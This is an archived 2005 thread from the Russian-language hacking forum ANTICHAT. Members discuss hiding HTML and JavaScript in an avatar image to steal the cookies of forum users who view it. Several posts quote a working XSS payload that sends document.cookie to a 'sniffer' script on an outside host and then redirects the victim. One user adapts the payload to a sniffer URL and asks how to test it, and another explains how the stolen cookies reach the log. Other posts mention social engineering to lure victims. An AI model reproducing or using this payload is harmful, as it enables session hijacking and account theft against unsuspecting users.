ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
12.11.2005, 22:26
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
2Фантастика по твоему js код может сработь при клике?)) аффтар жжёт))
мда... для размышления |
|
|
13.11.2005, 00:24
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Сообщение от ZaCo
2Фантастика по твоему js код может сработь при клике?)) аффтар жжёт))
мда... для размышления
\А как по твоему ява срабатывает? Да и написано ведь куда кликать надо. Аватара ни причём.
Не знаю, у меня работает...
|
|
|
|
13.11.2005, 01:06
|
|
Banned
Регистрация: 20.06.2005
Сообщений: 880
Провел на форуме:
4610226
Репутация:
1332
|
|
А как по твоему ява срабатывает
<body onload=javascript :alert('XAXA')> ну и куда здесь тыкать нужно?=)
|
|
|
|
13.11.2005, 09:20
|
|
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503
Репутация:
454
|
|
А в панбб не работает!!! Матюкается что не подерживает тип. Кто его учил внутрь файла лезть и че-то там читать?
Если он определяет тип картинки по расширению, то че говорит, что не тот тип когда внутри в ней хтмл код?
|
|
|
|
13.11.2005, 14:06
|
|
Постоянный
Регистрация: 14.08.2005
Сообщений: 378
Провел на форуме:
670862
Репутация:
54
|
|
Конечно, этот способ требует СИ, но если уж не работает ничто другое, то можно и его поюзать...
|
|
|
|
14.11.2005, 20:12
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Короче Я в двух словах прочитал твою статью первый раз, потом полностью прочитал твою статью второй раз, и нашёл, что оказывается прочитав твою статью как попало первый раз, у меня появилось бессмысленное количество идей и реализований, и разговаривая с самим собой, Я начил отвечать самому себе, что будет работать а что нет в твоей статье забыв что говорил ты, а что Я говорил сам себе
=) Бывает. Но что именно забавно - вот такое первое невнимательное чтение статей (любых) иногда приводит к интересным идеям.
Плюсик, ну или крестик будет когда картинка не может отобразится
Да это я понял, я просто допетрить никак не могу откуда ты это взял из статьи.
Потом когда человек глянет на твою аватару, то его куки улитят. Какой смысл вообще его на сайт с определённым разширением заманивать вообще не ясно.
Просто тут смотри чего выходит: я постю тему и в ней прошу посмотреть на мою аватарку. Нафиг кто будет заходить по ссылке смотреть аватар, если он у меня на форуме уже виден? Плюс некоторые форумы если ссылка на изображении - могут это изображение сразу вставить. А так - народу требуется прогуляться и заценить что либо: сайт, изображение или еще чего.
Что бы ты не говорил, чтобы ты не делал, Я уже на четыри пять шагов вперёд тебя!
Кто бы сомневался.
Да я и не стремлюсь никого обгонять или догонять. Мне и так комфортно.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
20.11.2005, 08:54
|
|
Познающий
Регистрация: 13.10.2005
Сообщений: 78
Провел на форуме:
507855
Репутация:
30
|
|
S phpbb kukisy letyat na ura 
<noscript> ))))
Последний раз редактировалось 1251soldier; 20.11.2005 в 08:57..
|
|
|
|
10.12.2005, 00:17
|
|
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме:
3175190
Репутация:
134
|
|
мммммммммммммммм
Сообщение от censored!
2.Открываем Блокнот, и пишем там следующий html-код:
...
Код:
<body onloаd="javаscript:document.locatiоn.replаce('http://www.АДРЕС_ЯКОБЫ_ВЗЛОМАННОГО_САЙТА.narod.ru/index.htm')">
<script language="JavаScript">
img = nеw Imаge(); img.srс = "http://АДРЕС_СНИФЕРА.ru/snifer.php?"+document.cookie;
</script>
...
Скажите пожалуйста.Вот допустим это адрес снифера : http://antichat.org/s/tyui.gif
Тогда правильно ли я сделал аватар?
<body onloаd="javаscript:document.locatiоn.replаce(' http://www.мой сайт.narod.ru/index.htm')">
<script language="JavаScript">
img = nеw Imаge(); img.srс = "http://antichat.org/s/tyui.gif/?"+document.cookie;
</script>
И как можно проверить это? Если допустим я открою такой аватар в IE то должен ли я попасть в лог снифера?
Последний раз редактировалось Гаврила; 10.12.2005 в 08:04..
|
|
|
|
10.12.2005, 00:45
|
|
Green member - Level 3
Регистрация: 02.11.2004
Сообщений: 1,337
Провел на форуме:
2398258
Репутация:
648
|
|
Если допустим я открою такой аватар в IE то должен ли я попасть в лог снифера?
Если ты откроешь этот аватар в ИЕ, то сначала куки уйдут на снифер, а потом ты будешь перенаправлен на сайт http://www.мой сайт.narod.ru/index.htm
Что такое снифер? (в понимании для использования XSS)
Это просто скрипт, который все что ему передали - записывает в лог. Передашь число - он число запишет: http://antichat.org/s/abcd.gif/?123, передашь куки - запишет куки.
А ты уже потом сам зайдешь в лог снифера и глянешь - есть там что или нет.
__________________
+ (это не крестик, это плюсик!)
__________________
•
•
•
|
|
|
|
10.12.2005, 00:53
|
|
Постоянный
Регистрация: 24.10.2005
Сообщений: 343
Провел на форуме:
3175190
Репутация:
134
|
|
Я открываю его в Ie. но мне открывается просто страница с крестиком....
Иду смотреть лог снифера,там пусто...
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
